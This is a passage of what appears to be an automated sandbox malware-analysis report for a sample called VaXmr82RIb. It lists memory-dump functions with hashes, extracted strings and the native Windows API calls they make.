Instruction Fuzzy Hash: 41C25F76E106398FCB25DF68C884699B7F6BB48310F5586EAD819E7340D734AE85CF80

Function 089F7A00 Relevance: 2.3, Strings: 1, Instructions: 1023COMMON

Download Yara Rule

Strings

PHjq, xrefs: 089F86C0

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: PHjq
API String ID: 0-751881793
Opcode ID: 6d766c3f0a744b709d8f6aa9799004ce17ac09d7eb892de76907426254ce5e5c
Instruction ID: f16bf4d453554ce450442e05ca8cdd9e52333cc7913ba4b85615685095deae2e
Opcode Fuzzy Hash: 6d766c3f0a744b709d8f6aa9799004ce17ac09d7eb892de76907426254ce5e5c
Instruction Fuzzy Hash: 2A82B776F102258FCB18DFA8C88459EBBF2EF8831071A856AD959EB351D735DC46CB80

Function 080E0980 Relevance: 2.1, Strings: 1, Instructions: 817COMMON

Download Yara Rule

Strings

'/3T, xrefs: 080E1351

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: '/3T
API String ID: 0-3084761499
Opcode ID: 6db61c5697fadd6a99f5ecd4aa9586bb1ffc8b7c4b08a23d22892da63447daaa
Instruction ID: b82227edffc7cd065e74813e0c123fd9dba43e9dc4780788e7d6bf4dc61d7a40
Opcode Fuzzy Hash: 6db61c5697fadd6a99f5ecd4aa9586bb1ffc8b7c4b08a23d22892da63447daaa
Instruction Fuzzy Hash: E75219B6F0063C4BCB68DEB8989166FB7E7AB84740705496ED84AFB380DE349C0587D5

Function 080E1CA0 Relevance: 1.9, Strings: 1, Instructions: 645COMMON

Download Yara Rule

Strings

RZ, xrefs: 080E1DDD

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: RZ
API String ID: 0-1855665147
Opcode ID: dd1c394d1e6669e3dc8efe8850be9d6fe17cca459d9923ba154b2672cad2ba9f
Instruction ID: 6052646f877e74b3ec87762461a469ae8e19e206d189c3b8043b949e573046c4
Opcode Fuzzy Hash: dd1c394d1e6669e3dc8efe8850be9d6fe17cca459d9923ba154b2672cad2ba9f
Instruction Fuzzy Hash: 0F32D576F102298FCB14DF69C8919AEBBF3AF85210715856EE805EB351DB35AC06CBD0

Function 0360DD32 Relevance: 1.9, Strings: 1, Instructions: 623COMMON

Download Yara Rule

Strings

=[-=, xrefs: 0360E627

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: =[-=
API String ID: 0-1001269455
Opcode ID: 1c0a3d246a522740975f142e121f457d280805ecbbed12597d5e138e5402b085
Instruction ID: dc6edcf97231a854eeed281ccc4d27e007c0152a9d7adfde426051cde67645cb
Opcode Fuzzy Hash: 1c0a3d246a522740975f142e121f457d280805ecbbed12597d5e138e5402b085
Instruction Fuzzy Hash: F362D479E102189FCB58DFA4D6946ACBBB2FF85210F6080ADD41AAB354DF356E81CF41

Function 0360DD40 Relevance: 1.9, Strings: 1, Instructions: 622COMMON

Download Yara Rule

Strings

=[-=, xrefs: 0360E627

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: =[-=
API String ID: 0-1001269455
Opcode ID: 6ce8f4899bc71b948221b80384c7a9cbbf75f9b6192f32e0deabff0958a45db6
Instruction ID: 399bd1c36d755862d93f020d78df04fd00b8fcbbb0b062f424bb02459650bc5c
Opcode Fuzzy Hash: 6ce8f4899bc71b948221b80384c7a9cbbf75f9b6192f32e0deabff0958a45db6
Instruction Fuzzy Hash: 2B52C479E102189FCB58DFA4D5946ACBBB2FF85210F6080ADD41AAB354DF356E81CF41

Function 080E8B8B Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

!=, xrefs: 080E8BC0

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: !=
API String ID: 0-3871193270
Opcode ID: 1247e0fb0f45b2e2c143279d3831848d497e81857d7692325a3f3cc0e8c9b454
Instruction ID: d6f52c42c1a1bbddaf4b21eb5be9717a32795be175b660c9e203d5ade3cc2c56
Opcode Fuzzy Hash: 1247e0fb0f45b2e2c143279d3831848d497e81857d7692325a3f3cc0e8c9b454
Instruction Fuzzy Hash: 95128F75B002158FCB58DFA9D8D0A6AF7E3AB88310B19C56DE809DB341DB75EC46CB80

Function 089FC158 Relevance: 1.8, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

-q90, xrefs: 089FC2FB

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: -q90
API String ID: 0-242358158
Opcode ID: 795b58cb0bbf1ddabb191c28aecf82a2a6313f585ac848a53143c4588bbab047
Instruction ID: db6e5e79b82392fcfd8202abb8d0a34b26ff780ae0d34239b9dcec58a20b394d
Opcode Fuzzy Hash: 795b58cb0bbf1ddabb191c28aecf82a2a6313f585ac848a53143c4588bbab047
Instruction Fuzzy Hash: 8E123FB6F106288FC758DFA8D89059EB7F6BB88314725856DD809EB345DB35EC06CB80

Function 089FAEE9 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

>Z(, xrefs: 089FAF59

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: >Z(
API String ID: 0-3970202910
Opcode ID: a13a243b497bcdc667bcbccfbe9c09d1ed2bfc984a124b7871796ee9a5e1eec7
Instruction ID: 9ba598f0018f434adfb2c660c01b0bd0a657c87e356522d4705e028f19b47a27
Opcode Fuzzy Hash: a13a243b497bcdc667bcbccfbe9c09d1ed2bfc984a124b7871796ee9a5e1eec7
Instruction Fuzzy Hash: AE12B476F002398FCB18DF68C894A59B7F2BB84214F1985AADD0EE7341DA349D85CF80

Function 034AB518 Relevance: 1.7, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

+4?h, xrefs: 034ABA39

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: +4?h
API String ID: 0-1856141625
Opcode ID: 550a8aa94720b5a36416f4cb712964d2c2ce6e555a65a1f78ea2ed66bcee034d
Instruction ID: 883ddc249db93e5452aef44c0c23d50beccce446ad48d51989c609fbf29c47d2
Opcode Fuzzy Hash: 550a8aa94720b5a36416f4cb712964d2c2ce6e555a65a1f78ea2ed66bcee034d
Instruction Fuzzy Hash: 04F1B579F106248F8B48EB6DE89496EB7E6EF8C7107094169E806EF364DA34DC01CBD5

Function 089FC220 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

-q90, xrefs: 089FC2FB

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: -q90
API String ID: 0-242358158
Opcode ID: 73cbb86404f16f19ae91866a46cd2eaee45f8c8e6a4495bbea2dd1f3c1e47ac7
Instruction ID: d0301129be084781318e0b5b3479011ba084097dd9e15096d4a21dd99ab0df26
Opcode Fuzzy Hash: 73cbb86404f16f19ae91866a46cd2eaee45f8c8e6a4495bbea2dd1f3c1e47ac7
Instruction Fuzzy Hash: 1E024EB6F106288FCB58DFA8C89059DB7F6BB88314715866DD809EB355DB35EC42CB80

Function 080E9857 Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

p, xrefs: 080E9860

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 880c61e28d761f51046b86f8b91bf705a2aad45f7117cb091f62e36a402344d6
Instruction ID: b52a463c4eb9cdbc3fcbeb529573684ecb5a5d324b8a3465b211a1cf225a6e34
Opcode Fuzzy Hash: 880c61e28d761f51046b86f8b91bf705a2aad45f7117cb091f62e36a402344d6
Instruction Fuzzy Hash: 26F17B74B142058FCB48CFA8D9D055AFBE3AF88300729C569E85ADB356DA75EC47CB80

Function 089F53F7 Relevance: 1.7, Instructions: 1682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2c3c66d94bbfe0a0629dcacbe11aa96de8e4476ef6a567e48d8f8c2f799d6d
Instruction ID: 3c6a0f22d59c6203944c650900a0c77ef477bed5043a5ce7403b2dd29ad6b6d6
Opcode Fuzzy Hash: ec2c3c66d94bbfe0a0629dcacbe11aa96de8e4476ef6a567e48d8f8c2f799d6d
Instruction Fuzzy Hash: 14F23F76A012198FDB54DF59CC84A99F7B3BB88314F2A82AAD509E7351D730ED86CF40

Function 089C7068 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

"H-z, xrefs: 089C710A

Memory Dump Source

Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: "H-z
API String ID: 0-3305940508
Opcode ID: 577f656907ab920559f1d7fc13e11e157ba41879900d9136babb4196751882cf
Instruction ID: c4a723105a39efec5445813f78d943f6273c32008ddd2eb8c386201a9873c37c
Opcode Fuzzy Hash: 577f656907ab920559f1d7fc13e11e157ba41879900d9136babb4196751882cf
Instruction Fuzzy Hash: FC027D76E102259FDB18DF9CD880999B7F2BB88310B1A8599EC05EB351D775EC42CF81

Function 034A9908 Relevance: 1.7, Strings: 1, Instructions: 406COMMON

Download Yara Rule

Strings

7i4A, xrefs: 034A9D94

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: 7i4A
API String ID: 0-2974772570
Opcode ID: 2b79bd5bc12d4e3cda80e0a82516a8216990f8a3669c8a1f4fa05ed401cff774
Instruction ID: e280cbb0b021a18c30060cbb22287b094c882f87c8bc4f0db989622c74f0c144
Opcode Fuzzy Hash: 2b79bd5bc12d4e3cda80e0a82516a8216990f8a3669c8a1f4fa05ed401cff774
Instruction Fuzzy Hash: 6CE1CC35B107198FCB14DF6DC8C0AAAB7B6BF98200F5981AAD419EF361DB70AC45CB54

Function 089F4DC8 Relevance: 1.6, Strings: 1, Instructions: 361COMMON

Download Yara Rule

Strings

6" , xrefs: 089F4DCF

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: 6"
API String ID: 0-216104082
Opcode ID: 145a950850fa156324664729adcc5155bd3af48c081ad335ea2e12d7636ea689
Instruction ID: 034927a6cceb09156aacd9c4f364ac984fa7fdd264713e8b56de4e29a17a4923
Opcode Fuzzy Hash: 145a950850fa156324664729adcc5155bd3af48c081ad335ea2e12d7636ea689
Instruction Fuzzy Hash: 25D11A76F002258FC718DF68C89099ABBB6AF8431071A856EDD19EB352D735DC46CBC0

Function 03604C48 Relevance: 1.6, APIs: 1, Instructions: 74nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 03604CEE

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 113e51c8592e366371de2df5d2f6dff6b57f7aa8631497db1dd27cd24e7c4256
Instruction ID: f5282f260d8ca35cac27d138eb492140fa148b8265dfab9c394bbc136b836087
Opcode Fuzzy Hash: 113e51c8592e366371de2df5d2f6dff6b57f7aa8631497db1dd27cd24e7c4256
Instruction Fuzzy Hash: 4A31D1B69002089FCF11DFAAD884ADEBFB5FF4C324F15841AE918A3250C7399951CFA0

Function 03604C50 Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 03604CEE

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 69214fd79fbee01366bdb41f537e43f4a4999f47eadf478085be2050b8f69c0b
Instruction ID: 04e9e84175774d1270f94159c7332e5e8ce8478c063f7294c73fae4214f6a8a1
Opcode Fuzzy Hash: 69214fd79fbee01366bdb41f537e43f4a4999f47eadf478085be2050b8f69c0b
Instruction Fuzzy Hash: FA31C0B5900209AFCF11DFAAD884ADEBFF5FF48324F14841AE918A3250C7799954DFA4

Function 036045A8 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03604639

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 929cb78295074123d2757d82f09c9566e077270601b2d1d73f6bf59b3e8217d5
Instruction ID: 1f33d0fa83a0a6b69d6d9ea32eb178bb444bf0dcc858cb4851b3c5d7decaaf65
Opcode Fuzzy Hash: 929cb78295074123d2757d82f09c9566e077270601b2d1d73f6bf59b3e8217d5
Instruction Fuzzy Hash: 9E21E4B1D012499FCB10DFAAD980AEEFBF5FF48314F24842AE419A7240D7759955CBA0

Function 03604AA1 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03604B34

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: b671d3569f769d2f8114d1cab4fe190d96615fdef07fed2e56a24ea0746109d7
Instruction ID: 344cb6ae012041b93c0671f57c44b080bf7227cf50264948ae354dc20b322ccb
Opcode Fuzzy Hash: b671d3569f769d2f8114d1cab4fe190d96615fdef07fed2e56a24ea0746109d7
Instruction Fuzzy Hash: 8721F6B1D00209AFCB10DFAAD980AEEFBB4FF48310F50851AE518A3240C7759955CFE0

Function 036049C9 Relevance: 1.6, APIs: 1, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03604A59

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: FileOpen
String ID:
API String ID: 2669468079-0
Opcode ID: 235f98448840b89194b359f5864281ce6ee0aa3ba1c72743d72e8962787e2169
Instruction ID: bd1fd625bd7f0753b066e634519759a2cf18b01a5b5e6fffb650ded16c9cec0a
Opcode Fuzzy Hash: 235f98448840b89194b359f5864281ce6ee0aa3ba1c72743d72e8962787e2169
Instruction Fuzzy Hash: F42107B1D012199FCB10DFAAD985ADEFBB4FF48314F20852AE518A7340C7759A55CFA0

Function 07B3DCA8 Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

3, xrefs: 07B3DD31

Memory Dump Source

Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1770408200
Opcode ID: 216348ffb753c184e24335d206328bc19955127bb8daf210e733658b5084bbc2
Instruction ID: 36db588a560ccff427bee20c8d3863eb226c1bed13784e82b3fe74d74c6aff27
Opcode Fuzzy Hash: 216348ffb753c184e24335d206328bc19955127bb8daf210e733658b5084bbc2
Instruction Fuzzy Hash: E4C17FB6B101258FD718DA69C98056AF7E6EB8421071A85AEDC09EB351DB35EC46CBC0

Function 03604AA8 Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03604B34

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: 0873170257bd00be8458567610902477e3fa2a2f68473a018227fddd7d9a5969
Instruction ID: 04ec29af806c264973b9107e6a5d76f2bb3e5ac292532ea531e4adeabdffd466
Opcode Fuzzy Hash: 0873170257bd00be8458567610902477e3fa2a2f68473a018227fddd7d9a5969
Instruction Fuzzy Hash: D02105B1D00209AFCB10DFAAD980ADEFBB4FF48310F50841AE518A3240C7759954CFE0

Function 03604681 Relevance: 1.6, APIs: 1, Instructions: 63memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0360470B

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e95e2f5b8343f174193e92e4743d4f3fd25cf69469eda67b7c9dbe571d5c4952
Instruction ID: c4ac03e0c1fa06fd150f3e7a01a6716fe5a87177c005d2439a5bacc46e51bf64
Opcode Fuzzy Hash: e95e2f5b8343f174193e92e4743d4f3fd25cf69469eda67b7c9dbe571d5c4952
Instruction Fuzzy Hash: C22114B5D002099FCB10DFAAC885ADEFBB5FF48324F50842AE519A7250C7799944CFA0

Function 036045B0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03604639

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: afb921645de4149d218b096ecb2ea6302cbe44eb9a0ffdce46643107cbc4194c
Instruction ID: b272918276b7a9dd2c35cdb2db22625b8a2009d91bd8e544843a57f654cb8249
Opcode Fuzzy Hash: afb921645de4149d218b096ecb2ea6302cbe44eb9a0ffdce46643107cbc4194c
Instruction Fuzzy Hash: FD21F2B1D002499FCB10DFAAD980AAEFBF5FF48310F60842AE519A3240D775A901CBA0

Function 036049D0 Relevance: 1.6, APIs: 1, Instructions: 63filenativeCOMMON

Download Yara Rule

APIs

NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03604A59

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: FileOpen
String ID:
API String ID: 2669468079-0
Opcode ID: 70986e51299fbfe50db80354a4f39b1d51465d87192d7ff46405ece2eaf21271
Instruction ID: 1923a3f933a352f154f7a33a55388763009100525fa1f79c7ab6ee72c6728eb7
Opcode Fuzzy Hash: 70986e51299fbfe50db80354a4f39b1d51465d87192d7ff46405ece2eaf21271
Instruction Fuzzy Hash: C221E4B1D01219AFCB10DFAAD985ADEFBB8FF48310F50842AE518A7240C7759A54CFE5

Function 03604E01 Relevance: 1.6, APIs: 1, Instructions: 63filenativeCOMMON

Download Yara Rule

APIs

NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 03604E8E

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: ControlDeviceFile
String ID:
API String ID: 3512290074-0
Opcode ID: 783cd993e91056a23b8446f0e65b8386a6e500778a2215013467234700d5f60e
Instruction ID: 53bf8fb10847eee8f2035512e1faa5258139cfc3ee7b3b604a871fb180c51823
Opcode Fuzzy Hash: 783cd993e91056a23b8446f0e65b8386a6e500778a2215013467234700d5f60e
Instruction Fuzzy Hash: C6210371D002099FCF21DFAAC884AEFBBB5FF48314F14841AE919A7250CB799955DFA0

Function 03604E08 Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON

Download Yara Rule

APIs

NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 03604E8E

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: ControlDeviceFile
String ID:
API String ID: 3512290074-0
Opcode ID: c15daefae6a6ed00f99d4582982eb1748dd6c7b265da99e8769a7c56287826f0
Instruction ID: 197cb4a3188743f4579439553ce6e41ef0604e8f937649cf04734dddcf5418ee
Opcode Fuzzy Hash: c15daefae6a6ed00f99d4582982eb1748dd6c7b265da99e8769a7c56287826f0
Instruction Fuzzy Hash: 0F2114718002099FCF11DFAAC884AEFBBF5FF48314F14841AE519A3250C7799955CFA0

Function 03604688 Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0360470B

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 81dd07245762922c8a306e76689af0d7c7773858760b01fb13925da2d1874d46
Instruction ID: fa3bb7c2335f2191e46ec9ac767401a7812f22a2eced079fbadcb119a7acf87f
Opcode Fuzzy Hash: 81dd07245762922c8a306e76689af0d7c7773858760b01fb13925da2d1874d46
Instruction Fuzzy Hash: 7821E2B1D002099FCB10DFAAC885ADEFBF5FF48314F50842AE519A7250CB7999448FA0

Function 03604D38 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 03604DB7

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: FileInformationQueryVolume
String ID:
API String ID: 634242254-0
Opcode ID: 5cacfb1961aaaf707642cc0ea0e7fb6074e7c4eb97501e45fd7dd67d5348150f
Instruction ID: 405a59f3073da40ba40573f08d21b2fda9812cee39efb0022b0298e9a9431d52
Opcode Fuzzy Hash: 5cacfb1961aaaf707642cc0ea0e7fb6074e7c4eb97501e45fd7dd67d5348150f
Instruction Fuzzy Hash: 5C2138B1D002098FCB10DFAAD880AEFFBF5AF88314F14842AD419A7240C7749541CFA0

Function 03604D40 Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 03604DB7

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: FileInformationQueryVolume
String ID:
API String ID: 634242254-0
Opcode ID: 8a0ce94b24c6c5f005bd32f820a4d601defb7f80bfbc4f55a36c051fa4c44b40
Instruction ID: 251c53a1098225e4a43a31caf393f7a740a5786813eebc030fe86e3f729bf96a
Opcode Fuzzy Hash: 8a0ce94b24c6c5f005bd32f820a4d601defb7f80bfbc4f55a36c051fa4c44b40
Instruction Fuzzy Hash: 2921F7B1D002499FCB10DFAAC884AEFFBF5AF48314F14842AD529A7250C7799945CFA1

Function 036040F0 Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 0360415A

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 0f6dc075d38e7539c8fb9817e4e2a994151e2f5f90de768612d59b46d32ed360
Instruction ID: 87c0dcf7f2d2e8bb0ff67febdcc170ff5eb347b58c9760df4153a6b5aa19ed11
Opcode Fuzzy Hash: 0f6dc075d38e7539c8fb9817e4e2a994151e2f5f90de768612d59b46d32ed360
Instruction Fuzzy Hash: 2A1137B1D002488ACB20DFAAD8857EFBFF4AB98324F248459D419A7340CB78A545CFA4

Function 036040F8 Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 0360415A

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e2989e2f797050bb7992ce393a20f50a2cf28b35f2e288a070e646498a48ecd7
Instruction ID: f12ef47c7eb0c7ab13090b8aebba9fcbbfb34ad29b04a1e99a33d566ccf47bc0
Opcode Fuzzy Hash: e2989e2f797050bb7992ce393a20f50a2cf28b35f2e288a070e646498a48ecd7
Instruction Fuzzy Hash: 15112BB1D003488ACB20DFAAC4457AFFFF4AB88324F148459D519A7340CB786544CFA4

Function 089FBD07 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

-Y+g, xrefs: 089FBF4C

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: -Y+g
API String ID: 0-3050812498
Opcode ID: b56c917c940e084bd7e8fb14881b0c4623463fe83eafa9c4c641ec513167f13d
Instruction ID: b04aaac01a561799cf0434610fcbf0f2a5f4972b79c152a38697254f01884750
